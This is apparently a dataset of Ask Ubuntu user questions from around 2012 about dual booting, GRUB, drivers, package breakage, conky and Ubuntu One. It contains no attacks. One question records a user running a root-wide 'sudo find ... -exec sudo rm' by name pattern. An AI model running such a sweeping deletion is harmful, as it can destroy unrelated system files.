137808	i am a ubuntu user with dual boot , does deleting some large files from system volume information cause some problms while using windows 7	when i am using ubuntu i see a large file on my partition which has windows 7 installed on it ... the file has a name- { 727a267e-992c-11e1-b9f7-00235aa5eeaf } { 3808876b-c176-4e48-b7ae-04046e6cc752 } in the folder system volume information and its occupying a size of 4.5 gb ... i want to get rid of it..so that i can use that space ... there is also a similar named file but it is only taking some kbs..so it does n't concern me i have not tried deleting the 4.5 gb one because i want to know-if it safe to delete this file ... i know that it will not cause any problems in ubuntu ... but is it safe to delete it if i want my windows 7 to run properly plz help me on this
137809	`` 32-bit libraries not found on this system '' when trying to install the intel c++ composer	i am installing intel c++ composer ( non-commercial version ) for linux with x32 and x64 target . during installation i get the warning message : step no : 4 of 6 | options > missing optional pre-requisite 32-bit libraries not found on this system . this product release requires the presence of 32-bit compatibility libraries when running on intel ( r ) 64 architecture systems . one or more of these libraries could not be found : libstdc++ ( including libstdc++6 ) glibc libgcc without these libraries , the compiler will not function properly . please refer to release notes for more information . i have installed ia32-libs but it did n't solve the issue . i have installed libstdc++ and regardless to it , it can not be found anyways . any ideas how to solve this ?
137813	wubi does not start in win7 64 bit	i have win7 64 bit and wish to install ubuntu 12.04 via wubi . seemingly i am unable to run wubi installer . made wubi installer as vista compatible . put the iso & wubi in the same folder . tried using the -- force method . in the log file it says to look for kubuntu alternate cd & can not find it maybe python variable are active or how could i delete them . any help - much appreciated
137814	partition not showing in dpkg-reconfigure grub-pc ( grub2 ) menu	i am trying to install grub boot loader on a partition /dev/sda3 ( ext3 formatted ) , but it is not showing as an option when i run dpkg-reconfigure grub-pc . my details are : i have a dual boot system set up with windows fully encrypted on sda1 . it is encrypted using truecrypt , so truecrypt is required on the mbr of sda . i will briefly outline the steps i have taken ( nb- this is dangerous , backup your boot sector first , or even better your whole hdd ) : encrypted windows on sda1 using truecrypt ubuntu 12.04 installed on extended partition sda5 ( within sda2 ) i need a logical partition to install grub , it will not work on extended ) - so i shrunk sda5 by 20 mib and then shrunk sda2 by the same this allowed me to create a new logical partition sda3 . i formatted it as ext3 and gave it the boot flag i started up a live boot disk , mounted /dev/sda5 to /mnt , and installed grub using grub-install -- force -- root-directory=/mnt /dev/sda3 this allowed me to restart and boot into ubuntu normally , happy days . at this point , after i boot into ubuntu normally , i usually run dpkg-reconfigure grub-pc . if i do n't do this , any update to grub , or a new kernel , will overwrite the main mbr of sda . in ubuntu 10.04 this is fine , i go through the menu , and it usually gives me the option to install grub onto whatever partition i want , but now , when i run it , it only gives me two options : /dev/sda or /dev/sda5 ( /dev/sda3 is missing ) . have i taken a step which stops /dev/sda3 showing up in this menu ? is there a way to fix this , or could you tell me how i can manually change the debconfig properties to get grub to install to /dev/sda3 by default . -- edit i think this is what i am looking for : http : //feeding.cloud.geek.nz/2010/10/manipulating-debconf-settings-on.html thank you !
137815	how to enable/disable mobile broadband from terminal ?	i use zte usb modem on natty narwhal . every thing works fine but sometimes it get disconnected . i want to write shell script that reconnects mobile broadband if it is disconnected or the received data is less than 20 kb after 5 seconds of connection . so my question is how to enable/disable mobile broadband ? how to check for data received ? and how to enable/disable network service ? note : terminal commands only or if you can write script , i 'll be very thankful .
137819	unity in 12.04 with vmwgfx ( vmware player 4.0.3 )	i have installed ubuntu 12.04 in vmware player 4.0.3 . i have also installed all updates . but when i login to unity it is not working . i can see desktop but dash and icons are disorted . i have read that vmwgfx should work on 12.04 . i have acer extensa 5220 notebook with intel x3100 graphics card . some time ago i have played with mesa/vmwgfx ( compliled from git ) and i was able to make 3d work in vmware . i suppose a fresh install of ubuntu will work . as vmwgfx was moved from staging and mesa is new enough . any suggestion what can be wrong ?
137821	gtk3 window is not redrawn correctly	i am creating a simple gtk3 application . the main toplevel window has a search button which will display another toplevel gtk3 window . when i click the close button ( near the titlebar ) on the second gtk3 window it closes as expected . however , when i click on the search button again , the second toplevel window is not redrawn with all its widgets..instead it appears empty . if on the other hand , i click the close button ( gtk button seen at the bottom ) it closes properly . and when reopned all the widgets can be seen . info : i created the ui using glade . the code is displayed below . however to get the ui files , you need to download the package . you can download them here # ! /usr/bin/env python from gi.repository import gtk import os , sys ui_file = `` main.ui '' second_ui_file = `` second.ui '' class sampleapp : def __init__ ( self ) : self.builder = gtk.builder ( ) self.builder.add_from_file ( ui_file ) self.builder.connect_signals ( self ) self.builder2 = gtk.builder ( ) self.builder2.add_from_file ( second_ui_file ) self.builder2.connect_signals ( self ) self.window = self.builder.get_object ( 'window ' ) self.window.set_position ( gtk.windowposition.center ) self.window.connect ( `` destroy '' , self.destroy ) self.window.show_all ( ) self.search = self.builder.get_object ( 'button1 ' ) self.search.connect ( `` clicked '' , self.search_clicked ) def destroy ( self , window ) : gtk.main_quit ( ) def search_clicked ( self , window ) : self.secondwindow = self.builder2.get_object ( 'window1 ' ) self.secondwindow.show_all ( ) def main ( ) : app = sampleapp ( ) gtk.main ( ) if __name__ == `` __main__ '' : main ( ) main window second window - toplevel second window - blank why does this happen and how do i solve this ?
137823	setting windows 7 as start up os during boot	how to set windows 7 as default for booting ? i am using dual boot in my laptop . and how do i later shift to ubuntu easily ?
137825	taking timely screenshots of particular sites	i have a website where i have to take weekly screen shots of sister sites . i was wondering how this maybe done . i had obtained the code for taking screen shots but have no idea how to open up the browser at a set particular time so that the website screen shots maybe taken . i understood that i had to use crontab to schedule my tasks but how to open the browser ? my script to take screen shots is as follows import gtk.gdk w = gtk.gdk.get_default_root_window ( ) sz = w.get_size ( ) # print `` the size of the window is % d x % d '' % sz pb = gtk.gdk.pixbuf ( gtk.gdk.colorspace_rgb , false,8 , sz [ 0 ] , sz [ 1 ] ) pb = pb.get_from_drawable ( w , w.get_colormap ( ) ,0,0,0,0 , sz [ 0 ] , sz [ 1 ] ) if ( pb ! = none ) : pb.save ( `` screenshot.png '' , '' png '' ) # print `` screenshot saved to screenshot.png . '' else : # print `` unable to get the screenshot . '' any idea how to to open the browser via a python script ? i 'm open to suggestions if this is not the right way to implement my idea .
137828	which programs to encrypt files work on every system ( linux , windows ... ) ?	with which programs can i encrypt files that work on every system ? ( linux , windows ... )
137829	openoffice impress ( ms powerpoint alternative ) not linking to projector	when i connect openoffice ppt for projector , it doesnt display or detect anything.while i can run the same in my windows os installed alongside . i donot know if it is a possible driver problem or a software problem . please help incase someone has solved such a problem .
137832	trash folder not showing files	how the topic says i ca n't view my trash folder in nautilus . i have read all tips here for the same bug but any answer was effective for solving my problem . this issue persist since upgrade to precise ... .i can access the trash folder when i navigate to the ./local/share/trash/* but not when i click on trash icon in nautilus . folder is accessible from the unity-dash too . also root nautilus gives error when trying to access trash folder : `` the folder contents could not be displayed . '' console : sudo nautilus ** message : initializing gksu extension ... intializing nautilus-pastebin extension ... initializing nautilus-dropbox 1.4.0 initializing nautilus-gdu extension ** ( nautilus:10971 ) : critical ** : nautilus_menu_provider_get_background_items : assertion `nautilus_is_menu_provider ( provider ) ' failed nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . ** ( nautilus:10971 ) : critical ** : nautilus_menu_provider_get_background_items : assertion `nautilus_is_menu_provider ( provider ) ' failed sys:1 : warning : /build/buildd/glib2.0-2.32.1/./gobject/gsignal.c:2572 : instance `0x1ac0000 ' has no handler with id `3281' shutting down nautilus-gdu extension xssession-errors : http : //www.pasteall.org/31880 thank you for the help
137846	how to install outlook lan messenger ?	i try to install outlook lan messenger ( om ) but could not install properly . i tried these steps : download om from outlook messenger official site for linux / ubuntu . try to install from the terminal but can not completed . please give me some idea behind this . edit : installation was complete by following below answers . not working , instead of lan ip set ? tell me other strategy how is it work when lan ip set ?
137850	accidentally accepted unknown ip to desktop sharing	i was using desktop sharing on 12.04 for some days , and there were a lot of connect requests from unknown ips . one of the connect requests i accidentally agreed to because i mixed up the agree-deny-buttons . i quckly cancelled the connection , but i was wondering whether a few seconds of this could possibly get my computer infected somehow , maybe leave some backdoor open ?
137851	how to remove window 's title bars ?	i know i can disable windows decoration via ccsm , which i currently do . im asking if there 's way to remove title bars without losing windows decorations and/or the ability to resize with the mouse . thanks .
137855	why do some shortcuts no longer work when using an alternate keyboard layout ?	i have recently switched to the colemak keyboard layout and the ctrl+alt+l key combination no longer locks the screen . i have checked the keyboard shortcuts menu and it is still set correctly . i have also tried locking the screen using this combination in dvorak , and the problem persists . changing back to qwerty restores the functionality , and although switching back is simple to do ( another shortcut ) it would be nice to be able to do this with colemak . there are other shortcuts that have also stopped working , so the problem is not specific to the lock shortcut : ctrl+d in terminal does n't close the terminal . my custom shortcut , super+t wo n't open the terminal . running ubuntu 10.04 . edit this question has a similar problem : terminal shortcut key not respecting keyboard layout edit 2 turns out this is a known bug : apply keyboard layout for control key combinations
137860	why is there no oprofile in 12.04 ?	i 've upgraded a ubuntu server from 11.10 to 12.04 . the oprofile package i installed is missed . as shown in https : //launchpad.net/ubuntu/precise/+source/oprofile/0.9.6-1.3ubuntu1 , oprofile seems to be deleted from the deb repository . why is that ? should i manually install oprofile or wait it back soon ?
137861	fans do n't wake up after suspend	the title says almost everything . if i suspend my ubuntu 12.04 on a compaq 615 laptop , on wake up everthing works perfectly apart from the fact that the fans do n't wake up , cpu heats and upon reaching 90째c somehow triggers the fans to start . ( idles at around 59째c ) . any ideas ?
137875	tell a process pid by it 's window ?	how i can tell a process image name ( to run from terminal using sudo ) showing on the ubuntu ui ?
137880	top-bottom panels are not showing up on startup in classic gnome in ubuntu 11.04	i use ubuntu 11.04 fully updated , classic gnome de , synaptic for installations and uninstallations . i have uninstalled banshee , empathy and evolution which are i am not going use ever . did mark for complete removal and also selected some other items like empathy-common , evolution-common , etc.. everything was fine until i rebooted it . both top and bottom panels are not showing . i am also using awn ( avant window navigator ) , so for now i am using it 's panels . i think i have uninstalled something which need to load those top and bottom panels . please help me to bring them back . : )
137882	cant ubuntu dash search files from every partition of my hard drive ?	lets say i have divided my hard disk in three partitions a b & c & i have chosen a to install ubuntu , b to keep all my movies & all my songs in c folder . now dash can find all my files which are there in folder ( a ) but is there any way it could show my movies n music files which i have kept in my b & c partition of the same hard drive .
137889	search option in update manager	i rarely use update manager and when ever i use it , i do n't update everything , just a few programs which i use more frequently . for selecting a update of a program i have to scroll through a huge list of updates . is there any option for searching for a specific update ( s ) ?
137891	laptop does n't boot , stops at grub screen	i installed ubuntu on a laptop 's hard drive along with microsoft vista . it was working perfectly , but a few days ago it stopped working . i do not know what has happened ... .on starting it is showing the following screen : gnu grub version 1.99-12ubuntu5 ... ... minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab possible device or file completions . grub >
137894	how to programmatically get a list of wireless ssids in range from networkmanager	i 'm writing a small little app that i want to submit to the ubuntu app review board , and one thing i 'd like to do is for it to show the names of the detected wireless ssids in a combo box . it 's a pygi app . has anyone got any pointers on how i can get those ssids from the system , preferably through a python api ? from dbus ? from networkmanager ?
137896	how to get the user downloads folder location with python	so , i 'm developing a simple download manager powered by wget , [ easydownloader ] [ 1 ] , which i 'm using for learning python , and i have a problem . i want to save files at the downloads folder , but it 's not called 'downloads ' in computers without ubuntu in english . so , i would like to know if there 's a downloads path or something simmilar in ubuntu ?
137904	stuck at busybox v1.18.4 ( ubuntu 1:1.18.4-2ubuntu2 ) built-in shell ( ash ) enter help for a list of commands	i 've installed win 7 and ubuntu 11.04 . i was trying to upgrade my machine to 11.10 . it was all good , it installed all the upgrades and asked me to restart . after restarting i got the login screen only once . after that there was just a blank screen . so i manually restarted it . now whenever i tried to restart , i get the busybox v1.18.4 ( ubuntu 1:1.18.4-2ubuntu2 ) built-in shell ( ash ) enter help for a list of built-in commands . ( initramfs ) here 's what happens when i boot : bios loads grub displays option to load : ubuntu with linux 3.0.0-19-generic ubuntu with linux 3.0.0-19-generic ( recovery mode ) previous versions linux memtest another memtest option win7 ( loader ) ( on /dev/sda2 ) i am able to log in to the windows 7 though . if i log on to the previous linux versions also i am ending up at the same error . things i have tried : when i type exec startx it gives the following error : /bin/sh : exec : line 0 : startx : not found [ 123.764413 ] kernel panic - not syncing : attempted to kill init ! [ 123.764441 ] pid : 1 , comm : init not tainted 3.0.0-19 generic # 33-ubuntu [ 123.764466 ] call trace : and a bunch of commands the caps lock but is blinking right now at this stage . i need to manually shut it down . tried to log in to the recovery mode it gives the error : a bunch of errors ( please let me know if i need to list them. ) then the last error is no init found . try passing init=bootarg . then i am stuck at the busybox error and the busybox initramfs prompt . tried to log in to the previous linux versions , but get the same busybox initramfs prompt . sudo fdisk -l disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xf5cd5cce device boot start end blocks id system /dev/sda1 2048 206847 102400 de dell utility /dev/sda2 * 206848 30926847 15360000 7 hpfs/ntfs/exfat /dev/sda3 30926848 953147119 461110136 7 hpfs/ntfs/exfat /dev/sda4 953149438 1465145343 255997953 f w95 ext 'd ( lba ) partition 4 does not start on physical sector boundary . /dev/sda5 953149440 1239869439 143360000 7 hpfs/ntfs/exfat /dev/sda6 1362751488 1465145343 51196928 7 hpfs/ntfs/exfat /dev/sda7 1239871488 1346158591 53143552 83 linux /dev/sda8 1346160640 1362745343 8292352 82 linux swap / solaris partition table entries are not in disk order sudo sfdisk -us -l /dev/sda disk /dev/sda : 91201 cylinders , 255 heads , 63 sectors/track warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . units = sectors of 512 bytes , counting from 0 device boot start end # sectors id system /dev/sda1 2048 206847 204800 de dell utility /dev/sda2 * 206848 30926847 30720000 7 hpfs/ntfs/exfat /dev/sda3 30926848 953147119 922220272 7 hpfs/ntfs/exfat /dev/sda4 953149438 1465145343 511995906 f w95 ext 'd ( lba ) /dev/sda5 953149440 1239869439 286720000 7 hpfs/ntfs/exfat /dev/sda6 1362751488 1465145343 102393856 7 hpfs/ntfs/exfat /dev/sda7 1239871488 1346158591 106287104 83 linux /dev/sda8 1346160640 1362745343 16584704 82 linux swap / solaris
137909	razer orochi и ubuntu 12.04	здравствуйте . у меня есть мышь razer orochi . хочу поставить ubuntu на ноутбук hp pavilion dv6-3124er . есть ли полноценные драйвера на данную мышь и будет ли работать `` turboboost '' на intel i7 ? hello i have mouse razer orochi . i want to put ubuntu on a laptop hp pavilion dv6-3124er . is there a full-fledged driver on this mouse and would work `` turboboost '' on the intel i7 ?
137911	getting error-'general error mounting filesystems ' while installing ubuntu 12.04 alongside windows 7 starter edition	i am trying to install ubuntu 12.04 on my hp mini 110 with 2 gb of ram and windows 7 starter edition . however , when i try to boot from usb , the ubuntu screen loads and then shows the message-'general error mounting filesystem ' . i have to press ctrl+d to reboot , and the same process starts again until i remove my pen drive . i have tried making a live usb from unetbootin and the software ubuntu suggests , downloaded from pendrivelinux.com . however , ubuntu still wo n't load . i am new to the ubuntu world and do n't know what to do , please help .
137925	reconfiguring dpkg in ubuntu 10.04	when i try to get certain libraries , i get the following message e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . it takes too long for it to run and i let my computer run overnight but woke up to a blank screen that does not respond . is this the only way to get dpkg to work right ? i 'm not sure if its a memory issue as well .
137927	use external monitor automatically , when started in docking station	i am using a thinkpad t510 and i often boot it in a thinkpad mini dock plus series 3 ( eu ) . the problem is that if i boot it with the lid closed , i can see grub , i can see the ubuntu boot splash , but after that my external monitor ( connected via vga ) turns off , and i have to open the lid and tell the nvidia driver manually to use the external screen and turn off the built in lcd panel . is there a way to put it into an udev rule , or something like that to avoid the manual switching ?
137928	wifi not working properly 11.10 ubuntu	when i boot up my lenevo v570 to ubuntu 11.10 then it shows me 'wireless hardware switch off ' however when i use windows and then reboot ubuntu then it works properly .
137932	screen going blank after grub launches kernel	i installed ubuntu 12.04 to a pair of inwin bl series machines with amd a4 series cpus and an asus motherboard ( asus f1a55-m/csm , micro atx , socket fm-1 ) . install was smooth , but when the machine boots the keyboard does not work at the grub menu , and when it boots the screen goes blank or displays garbage . i can blindly login and reboot the machine so its obviously running , but video is totally messed up . control-alt-f1/2 does not give me a text console . i have booted the cd to rescue mode and set grub to text mode , which works ... but as soon as the kernel loads i see it change the font and then the screen again goes blank . the keyboard ( usb ) does not work until the system is booted so i ca n't interrupt grub to do anything there . i assume ubuntu is setting some graphics or text mode that this hardware does not like .
137933	broken packages , synaptic and libre office broken , when upgrading to 12.04	i upgraded to version 12.04 this morning . has caused broken packages which i can not undo because it has caused brakages in my synaptic package manager . i can not use libre office writer and every time i enter calc , math , writer etc , it automatically reverts to 'calc ' i use writer in virtually all my applications and run my business with it . is there any way to fix these breaks .
137938	separate partition for ubuntu ?	i have windows vista installed on my c drive . i want to install ubuntu on my home pc . do i require another partition or can i install ubuntu on the same c partition as my windows vista . please respond back . thanks , fahad zia
137942	why is n't ubuntu one updating the list of folders ?	i am hoping that somebody can help me . i am quite new to linux & ubuntu although i am very keen to learn this new ( for me ) setup . i have previously been using asus webstorage for my online backups but their eeestorage is horrendous . i am therefore starting to use ubuntu one but that is also causing me problems . i do n't think the program installed correctly in the first place and after several crashes i removed the program via software centre , removed everything that came up in the package manager when i did a search for ubuntuone and then did : cd / sudo find -iname '*ubuntuone*' there appeared to be nothing major so i went with sudo find -iname '*ubuntuone* ' -exec sudo rm { } \ ; restarted the machine then installed via software center and added all the associated things in package manager that i had previously removed . i now have the same issue as before ( but now at least the program carries on running ) . when i add a folder via the ubuntu one interface i select the folder as normal but it does n't appear on the list . similarly when i right click a folder in the explorer and select synchronize it does n't appear on the list . i have added a few folders this morning and then left it as i though that i may not be able to add more folders until the current ones have syncronized . the gui tells me that the folders total 130 mb but after about 6 hours there is still no change ... the ui tells me that file sync is in progress . i did u1dstool -- waiting and a list of files came up . i tried u1sdtool -- start and then u1sdtool -- create-folder=/home/john/.vim and now it looks like it is just hung in the terminal after about an hour of no activity . i am using ubuntu 12.04 and after a search of google and the usual sites i can not find anybody who has the same issue . i can see that there are problems with people adding hidden folders but this is the same when i try and add a non-hidden folder . thanks in advance.. in general i am loving ubuntu and although there are a few programs that i can not find decent replacements for in ubuntu i think i am going to try and stick with it . john
137960	heimdall-frontend fails with undefines symbol error	trying to run heimdall 1.11 and here is the error i get when trying to use the program heimdall-frontend : symbol lookup error : heimdall-frontend : undefined symbol : _zn9qlistdata11detach_growepii can anyone help ? thank you
137963	update manager fails due to typo in a sources.list file	tijger @ tijger-presario-cq57-notebook-pc : ~ $ sudo do-release-upgrade [ sudo ] password for tijger : checking for a new ubuntu release get:1 upgrade tool signature [ 198 b ] get:2 upgrade tool [ 1550 kb ] fetched 1550 kb in 0s ( 0 b/s ) authenticate 'precise.tar.gz ' against 'precise.tar.gz.gpg ' extracting 'precise.tar.gz' reading cache a fatal error occurred please report this as a bug and include the files /var/log/dist-upgrade/main.log and /var/log/dist-upgrade/apt.log in your report . the upgrade has aborted . your original sources.list was saved in /etc/apt/sources.list.distupgrade . traceback ( most recent call last ) : file `` /tmp/update-manager-auln5x/precise '' , line 7 , in < module > sys.exit ( main ( ) ) file `` /tmp/update-manager-auln5x/distupgrademain.py '' , line 217 , in main save_system_state ( logdir ) file `` /tmp/update-manager-auln5x/distupgrademain.py '' , line 125 , in save_system_state clone.save_state ( sourcedir= '' / '' , target=target , with_dpkg_status=true ) file `` /tmp/update-manager-auln5x/apt_clone.py '' , line 131 , in save_state self._write_state_installed_pkgs ( sourcedir , tar ) file `` /tmp/update-manager-auln5x/apt_clone.py '' , line 158 , in _write_state_installed_pkgs cache = self._cache_cls ( rootdir=sourcedir ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 93 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 140 , in open self._list.read_main_list ( ) systemerror : e : type 'ain ' is not known on line 1 in source list /etc/apt/sources.list.d/_gnac-team-ppa-oneiric.list tijger @ tijger-presario-cq57-notebook-pc : ~ $
137966	copy cd / dvd contents into an iso file	the title seems to be self explainatory . i just want a software to do that . i already have nero linux but i dont think it is capable of doing it . trying out the command line method i get an input /output error though the iso file seems to be fine also adding bs=1024 doesnt help much
137967	how to add guake to the unity top bar ?	i am using guake in ubuntu 12.04 64 bit , is there any way i can put it on the unity top panel .
137975	when will kde 4.8.3 land in kubuntu 12.04 ( official repository ) ?	when will kde sc 4.8.3 be available in the kubuntu 12.04 official repositories ?
137977	mount encrypted home during boot ( dm-crypt , luks )	i just installed ubuntu 12.04 on my notebook having kept an old luks encrypted partition on my drive . this partition shows up in the file manager an can be mounted from there into /media/ [ uuid ] . now i would like to mount this partition during system boot . for that i added /dev/mapper/cryptohome /home xfs errors=remount-ro 0 2 to my /etc/fstab and cryptohome uuid= [ ... ] none luks to my /etc/crypttab during boot i am asked for the luks password upon which the /dev/mapper/cryptohome is ready . while i enter the password the mount command seems to be executed concurrently . this leads to a failed mount . i am able to mount /dev/mapper/cryptohome manually shortly after the automatic mount failes . how can i make mount aware that it needs to wait until the luks password is entered successfully ? thanks , philipp
137980	is it possible to auto-arrange the active unity launcher icons ?	i am using ubuntu 12.04 x64 bit as default de . i was guessing it is possible to auto arrange the current-active applications in unity launcher panel to align in lastly-opened or firstly-opened in ascending or descending order , irrespective of their locked positions in the unity launcher panel . just to get rid of scrolling down the launcher panel every time to search active application thereby depriving the need of alt-tab shortcut . i mean alt-tab alternative in more smarter way , though i also use alt-tab for the task management purpose .
137982	how to get a list of installed software packages ?	i am on a `` grown '' system . my initial setup was using ubuntu 9.04 . but now with the 12.04 update i got stuck . my system is freezing or wired errors occour . i want to reinstall my system on a clean partition . how can i get a list of the packages i installed in my system ? i want a list with the base packages not all the dependecies , so i can install all packages on my clean install again with the correct ( maybe new ) dependencies . i other words : i want to retrieve a list of all packages installed with apt-get directly . not the ones it additionally installs with these packages . thanks !
137983	logitech keyboard not recognized every time	i have a triple installation : ubuntu 12.04 , ubuntu 11.04 and windows vista . after installing 12.04 in a separate partition , when i boot 12.04 my keyboard is not ( always ) recognised . the only thing i can do then is to reboot , and most of the time after the reboot , the keyboard again works normally . i already tried changing the batteries of the wireless keyboard ( logitech k340 ) . i do n't have this problem with vista or 11.04 , so i think the reason for this happening must be found somewhere in 12.04 ( unity 2d ) . does anyone have any idea or a solution ?
138003	ca n't watch youtube flash videos in opera browser on ubuntu	i ca n't watch youtube videos in my opera browser on ubuntu 10.04 , the page is fully loaded but the space where the player is to be is blank ( black ) and i have flash player installed but it still wo n't work ... any advices on the matter ?
138005	can i change the network section of my conky to support my wifi ?	so i 've been having fun with setting up my new conky which i downloaded recently ( i 'm running ubuntu 12.04 ) . i am having a problem with the section of the conky which measures network parameters . i 've looked at the .conkyrc_net file and i have found sections which mention eth1 several times . i wanted to know if i changed this code to wlan0 would it correct the problem i am having and begin measuring my wifi network parameters ? i am very new to linux and have no code writing experience but i have spent the last two days researching it and would like to try and fix this . here is the code from the conkyrc_net file : background yes font ubuntu : size=8 xftfont ubuntu : size=8 use_xft yes xftalpha 0.5 update_interval 1.0 total_run_times 0 own_window yes own_window_type override own_window_transparent no own_window_hints undecorate , sticky , skip_taskbar , skip_pager double_buffer yes draw_shades no draw_outline no draw_borders yes border_width 1 draw_graph_borders yes minimum_size 180 maximum_width 220 default_color 5382ba default_shade_color 000000 own_window_colour 191919 color3 737373 # graph border color2 ffffff # title color1 ffffff # text color0 ffa500 # icon alignment top_right gap_x 30 gap_y 656 no_buffers yes cpu_avg_samples 2 override_utf8_locale yes uppercase no use_spacer none temperature_unit fahrenheit text $ { color0 } $ { font conkysymbols : size=16 } i $ { font } $ { color } $ { color2 } networkâť $ { color } $ { color1 } up $ alignr $ { upspeed eth1 } k/s $ { color3 } $ { upspeedgraph eth1 20,183 474747 e9e9e9 } $ { color } $ { color1 } total up $ alignr $ { totalup eth1 } $ { color } $ { color1 } down $ alignr $ { downspeed eth1 } k/s $ { color3 } $ { downspeedgraph eth1 20,183 474747 e9e9e9 } $ { color } $ { color1 } total down $ alignr $ { totaldown eth1 } $ { color } $ { color1 } local ip $ alignr $ { addr eth1 } external ip $ alignr $ { execi 1 ~/.scripts/ip.sh } $ { color } i 'm assuming this is the file where the problems lies only from its _net reference : ) any help would be much appreciated : )
138011	lost space in ubuntu 12.04 along with windows 7	i have successfully installed ubuntu 12.04 along with windows 7 ( dual boot ) . my original hard drive was of 2t and after ubuntu installation it became 1t for windows and remaining 1t space is missing both in windows and in ubuntu . i need your help in recovering the remaining 1t and associate it with ubuntu .
138019	unable to open eclipse ide due to missing symlink	i 'm not a big fan of eclipse but sometimes i use it to deploy apps on google app-engine . so today morning i woke and was all set to deploy my new python app on google 's app engine and that 's when noticed the below quoted error . an error has occurred . see the log file /home/rupali/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration/1336830746877.log . i tried running a few commands suggested by forums but they returned with an error . sudo update-alternatives -- config java there is only one alternative in link group java : /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java nothing to configure . help me please !
138021	is it possible to turn the video card off in a laptop to use it as a headless server ?	since i recently upgraded my it infrastructure , i decided to use my old laptop as a home server . the problem is that the machine sports a powerful nvidia card that even at idle generates enough heat to stay 80째c hot . the laptop is a dell xps m1710 , with a512mb ddr3 nvidia geforce go 7950 gtx graphics card . i 'm running ubuntu 12.04 . given that i control the server via ssh , i thought that maybe i could somehow `` turn off '' the video card ... is this at all possible ? if yes , how ?
138023	gnome shell does not log out properly in ubuntu 11.10	my problem is that when i log out from a gnome shell session i get a blank screen instead of the display manager . if i close the lid to suspend and then open it again , i get the display manager and i can log back in . this does not happen with unity . when i log out from a unity session i get the display manager without any problem . i 'm running ubuntu 11.10 64bit , with gnome-shell version 3.2.2.1 . i already checked /etc/x11/default-display-manager , and it 's set to /usr/sbin/lightdm , as it should be , according to this post : http : //askubuntu.com/a/84485/61336 . this is the exact same problem described here ubuntu 11.10 with gnome shell does not logout properly , but as you can see , i provide some additional information . i tried to leave a comment in the original question to avoid a duplicate , but i do n't have enough reputation . i also tried to ask in the meta section what to do in order to avoid a duplicate in this situation , but again , not enough reputation .
138025	why do n't dconf-editor and dconf list show the same directory structure ?	i 'm running ubuntu 11.10 with unity 2d . if i open the dconf-editor and navigate through : org > gnome > gedit > plugins i see a directory for plugins and the keys : drawspaces , externaltools , pythonconsole , terminal and time . if , from a gnome-terminal , i enter the command dconf list /org/gnome/gedit/plugins/ i see the key active-plugins and the directory filebrowser . why do n't i see the same thing with both dconf-editor and dconf list ? ? ?
138026	how do i delete kernels from a server ?	i need to delete older kernels from a server to make room for updating to a new one . i ca n't really use gui-based methods like synaptic , and apt-get remove -- purge did n't work . what to do ?
138028	lowgraphicsmode 12.04	i recently installed the latest ubuntu . it worked very well until i encountered the following problem last week . i have 4 options but no mode is activated ( ? ? ? ) . i do n't know what to do now . my specs are as follows : intel hd graphics processor family intel core i5 lenovo thinkpad t420 . original untranslated version : soy novoto recien instalado ubuntu , me andaba super bien desde que salio hasta apenas la semana pasada me dio este problema me da 4 opciones este mode solo que ninguna es activa , no se que hacer para poder solucionar esto pues tengo todo mi trabajo en la maquina y ahora batallo con ubuntu , mi tarjeta de video es una intel hd graphics family procesador intel core i5 2410-m lenovo thinkpad t420
138031	how to change the default selection in grub2 ?	i have installed first windows 7 , then i installed ubuntu 11.10 . now the boot loader is grub and is showing a list of operating systems : ubuntu 11.10 windows 7 the default os is ubuntu , and if no action is detected after 10 seconds , the grub choose ubuntu to start . how can we configure the grub in order to chance the default os ? i want windows 7 to be the default os and if no action is detected after 10 seconds , the os that begins must be windows 7 . thanks
138032	uninstall ubuntu 11.04/11.10	i dual booted ubuntu 11.04/11.10 a while ago with a usb stick and i want to uninstall it . i have a 64 bit laptop . please help !
138035	edubuntu boots in low graphics mode . with an intel hd graphics system	i have a hd intel graphics card in my laptop . it was working fine the first few days with the new version edubuntu . now when you start , just before it goes to the part asking for the login password i think the op means lightdm it sends me to a low graphics mode . things i 've tried : i tried ctl+alt+f1 . updated and installed fglrx from the terminal . all my work is all stored there . please , if anyone knows how to fix this , tell me . original version : hola tengo una tarjeta intel hd graphics en mi laptop estuve trabajando los primeros dias bien con la nueva version edubuntu solo que ahora cuando inicia y justo antes de que pase a la parte que me pide la contrase単a me manda low graphic mode no se que hacer ya entre y le di ctr alt f1 y actualice tmb instale fglrx necesito obtener toda miinformacion todo mi trabajo esta ahi guardado , por favor si alguien sabe como solucionar este bug digame como , gracias , ciao .
138037	how to integrate projectm in vlc ?	i have installed both vlc and projectm ( pulseaudio ) from the software center , but i the visualizations that appear in audio - > visualizations have not changed . how can i launch the projectm visualizations from vlc . ( i 'm using ubuntu 11.10 . ) thanks !
138040	is there any way to force dropbox to open the dropbox folder in a file manager other than nautilus ?	i 'm using ubuntu 12.04 , with both pcmanfm and nautilus installed . i 've succesfully set the default file manager to pcmanfm : i 've accomplished that by doing the following steps : right-clicking a directory - open with ... - choose pcmanfm choosing pcmanfm as the file manager in exo-preferred-applications running mimeopen -d ~/dropbox , and choosing pcmanfm right now , every folder i open , opens in pcmanfm . this is what i want . however , when i click the dropbox icon in the upper bar of the screen , and then 'open dropbox folder ' , dropbox will be opened in nautilus instead of pcmanfm . is there any way to force dropbox to open it in pcmanfm instead ?
138043	how do i uninstall a dual boot 11.10 ?	i dual booted 11.10 a while ago and it got messed up to where i ca n't use it at all . is there a way to uninstall a dual boot so i can install the newest 12.04 version of ubuntu ? please help !
